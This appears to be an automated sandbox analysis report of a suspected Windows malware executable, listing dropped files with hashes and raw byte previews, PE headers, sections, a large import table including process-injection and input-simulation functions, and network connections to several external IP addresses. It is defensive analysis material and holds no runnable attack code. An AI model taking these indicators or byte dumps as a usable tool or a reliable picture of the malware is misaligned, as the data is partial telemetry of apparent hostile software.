XBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2S

C:\Users\user\AppData\Local\Temp\aut5333.tmp

Download File

Process:	C:\Users\user\Desktop\150-425-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	9890
Entropy (8bit):	7.593831505201896
Encrypted:	false
SSDEEP:	192:m+cKsSwxOCyTkff82lMdISQUNa53yJO96jSomIrN0r+L97+VljpzG5NE:97sSwcHkHUOSQl3yJO4jMXS7y5pyu
MD5:	C13C82E56BAD1F76739D460B84D9A0EA
SHA1:	04BCA737E73AD37624E55973AECBEC364A41B293
SHA-256:	4559A8761726B968BA6FEEC3AF647A199585B2F116CD51D61881C74C2A0E274D
SHA-512:	0B82C517C6C82AC0DF14F6B40141F115559AFDDE8F6F7CDBDBA9F969D6BCD4B1F30D27B5137D635DBFDB07F2058CEB67919EC4232DB34A0BA8EA9DD166DD2A70
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\nonsubmerged

Download File

Process:	C:\Users\user\Desktop\150-425-2024.exe
File Type:	AmigaOS bitmap font (TFCH) "\2512FV4\001\261\273Q\311\220\310\205}\271FU\365\332\362{[J\247\252\325A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV\214Y2SV]\342EE\365;\213w\214X~\236y\0260"6aB49S+S>x!9%+.Ff4Qy@&6b1%e\005}\025vY6V6vOUAaA2FV4Y2*YK", tfc_TagCount 21336, tfc_YSize 16984, 3607 elements, 2nd "A\022BV4[2SXBXKGAr\307V4I2SHBXKEQ2FF4Y2SXBHKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXB"
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.9926021750149445
Encrypted:	true
SSDEEP:	6144:d4YspMId1UGaBWz4h0JZyGWI0xwp2Vpl89ERW9TK+uS/JAy8PHljznqc3:d4YuPcWsh0JgGZQCSmBAy8PNznL3
MD5:	BF5C06BACDAF351215354990E2547C19
SHA1:	61EDC77500CBD7F17D722619FA0C611F54846ACB
SHA-256:	56A75E7CC4F0F705C861C57C88737EED38B2B4FE13707085B4992F42DF4D7502
SHA-512:	E44750ECB8D06557562C1E69C17112E26451AEBC9BE6DBB92DA2DB4DA805EC930B50BC4911B0350D2B3924BA246CB7F1867F2CE224FBABB7CA8A61781A5FD971
Malicious:	false
Reputation:	low
Preview:	.....2FV4...Q..}.FU...{[J...A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV.Y2SV].EE.;.w.X~.y.0"6aB49S+S>x!9%+.Ff4Qy@&6b1%e.}.vY6V6vOUAaA2FV4Y2*YK.v%&.{6S..3?.B...&1.C...~8,.[...9U..+;#x!U.V4Y2SXBX..A2.W5Y.;..XKEA2FV4.2QYIY@EA"BV4Y2SXBXK.T2FV$Y2SxFXKE.2FF4Y2QXB^KEA2FV4_2SXBXKEA.BV4[2SXBXKGAr.V4I2SHBXKEQ2FF4Y2SXBHKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKk5W>"4Y2.WFXKUA2FF0Y2CXBXKEA2FV4Y2SXbXK%A2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2SXBXKEA2FV4Y2S

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.47392784024318
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	150-425-2024.exe
File size:	1'528'320 bytes
MD5:	c93c9f74b4f78e098f297fd4dafff423
SHA1:	f516c24f73d9448263a4b3f12145d05ab2019c07
SHA256:	7176ddc82577be37240e7842e497ed7a16af40ff27cf8db62439422f93994c47
SHA512:	02a85e6bc7dddf4621d9eb525480135b44b5a9b3fa9883e6186747dcd7d039ccb4d8a28f15e7bff4c13687efde07e0bcc77e6aaaef7a74755b7aa067b561a5cd
SSDEEP:	24576:iAHnh+eWsN3skA4RV1Hom2KXMmHac72DP3RrFF9Nix5:lh+ZkldoPK8YacO39TY
TLSH:	86659D037391C0FDFEAB9173DF5AF20D567B6C650723841F2ED82E69AB700A1162D662
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	be8f71b3b3312e0a

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x662A193A [Thu Apr 25 08:50:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9FA46E69ADh
jmp 00007F9FA46D9764h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9FA46D98EAh
cmp edi, eax
jc 00007F9FA46D9C4Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F9FA46D98E9h
rep movsb
jmp 00007F9FA46D9BFCh
cmp ecx, 00000080h
jc 00007F9FA46D9AB4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9FA46D98F0h
bt dword ptr [004BF324h], 01h
jc 00007F9FA46D9DC0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F9FA46D9A8Dh
test edi, 00000003h
jne 00007F9FA46D9A9Eh
test esi, 00000003h
jne 00007F9FA46D9A7Dh
bt edi, 02h
jnc 00007F9FA46D98EFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9FA46D98F3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9FA46D9945h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0xaabb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x173000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0xaabb4	0xaac00	e886168ea015a17fd3a42cab2baa092f	False	0.486752779557101	data	5.858901813912119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x173000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc8548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc8670	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc8798	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc88c0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m	English	Great Britain	0.03775483031038258
RT_ICON	0x10a8e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	Great Britain	0.45478723404255317
RT_ICON	0x10ad50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	Great Britain	0.170850622406639
RT_ICON	0x10d2f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	Great Britain	0.2453095684803002
RT_ICON	0x10e3a0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	Great Britain	0.06644090855317639
RT_ICON	0x11ebc8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	Great Britain	0.12641709966934342
RT_MENU	0x122df0	0x50	data	English	Great Britain	0.9
RT_STRING	0x122e40	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0x1233d4	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0x123a60	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0x123ef0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0x1244ec	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0x124b48	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0x124fb0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0x125108	0x4d518	data			1.000334705837775
RT_GROUP_ICON	0x172620	0x5a	data	English	Great Britain	0.7666666666666667
RT_GROUP_ICON	0x17267c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x172690	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1726a4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1726b8	0x10c	data	English	Great Britain	0.585820895522388
RT_MANIFEST	0x1727c4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 10:06:52.760699987 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.097246885 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.097372055 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.100013971 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.436449051 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.437087059 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.437129021 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.437269926 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.440320969 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.445997953 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.446067095 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.647475004 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:06:53.647553921 CEST	49709	80	192.168.2.9	154.215.72.110
Apr 26, 2024 10:06:53.776788950 CEST	80	49709	154.215.72.110	192.168.2.9
Apr 26, 2024 10:07:08.968920946 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:09.255162954 CEST	80	49710	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:09.255268097 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:09.257117033 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:09.543216944 CEST	80	49710	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:09.559763908 CEST	80	49710	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:09.613039970 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:10.414439917 CEST	80	49710	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:10.416069984 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:10.769460917 CEST	49710	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:11.833236933 CEST	49711	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:12.139223099 CEST	80	49711	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:12.139389992 CEST	49711	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:12.141343117 CEST	49711	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:12.446845055 CEST	80	49711	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:12.586038113 CEST	80	49711	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:12.586060047 CEST	80	49711	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:12.586198092 CEST	49711	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:13.680493116 CEST	49711	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:14.694063902 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:14.980142117 CEST	80	49712	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:14.980288029 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:14.982321024 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:15.269283056 CEST	80	49712	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:15.269299030 CEST	80	49712	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:15.270483017 CEST	80	49712	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:15.316143990 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:16.070507050 CEST	80	49712	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:16.070632935 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:16.488935947 CEST	49712	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:17.506947041 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:17.802843094 CEST	80	49713	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:17.802963018 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:17.804876089 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:18.100667000 CEST	80	49713	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:18.101933956 CEST	80	49713	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:18.144290924 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:18.924410105 CEST	80	49713	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:18.924634933 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:18.925467014 CEST	49713	80	192.168.2.9	202.172.28.202
Apr 26, 2024 10:07:19.221970081 CEST	80	49713	202.172.28.202	192.168.2.9
Apr 26, 2024 10:07:24.535393000 CEST	49715	80	192.168.2.9	116.50.37.244
Apr 26, 2024 10:07:24.861237049 CEST	80	49715	116.50.37.244	192.168.2.9
